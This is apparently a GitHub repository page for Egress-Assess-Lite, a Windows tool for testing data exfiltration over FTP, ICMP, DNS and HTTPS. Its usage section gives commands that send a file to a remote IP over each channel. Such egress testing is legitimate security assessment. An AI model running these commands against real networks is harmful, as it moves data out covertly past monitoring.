Skip to content

Lite version of Egress-Assess made specifically for Windows

License

Notifications You must be signed in to change notification settings

d4rk-d4nph3/Egress-Assess-Lite

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Egress-Assess-Lite

Adapted from FortyNorthSecurity's Egress-Assess

Specially made to be assess exfiltration in Windows systems.

Supported clients are:

  • FTP
  • ICMP
  • HTTPS
  • DNS

Deployment

pip install PyInstaller==3.6   # For python 2
pyinstaller --onefile Egress-Assess-Lite.py

Usage

./Egress-Assess-Lite.py --client ftp --username test --password ftp --ip 10.1.1.1 --file resume.docx
./Egress-Assess-Lite.py --client icmp --ip 10.1.1.1 --file resume.docx
./Egress-Assess-Lite.py --client dns --ip 10.1.1.1 --file resume.docx
./Egress-Assess-Lite.py --client https --ip 10.1.1.1 --file resume.docx

About

Lite version of Egress-Assess made specifically for Windows

Topics

Resources

License

Stars

Watchers

Forks

Languages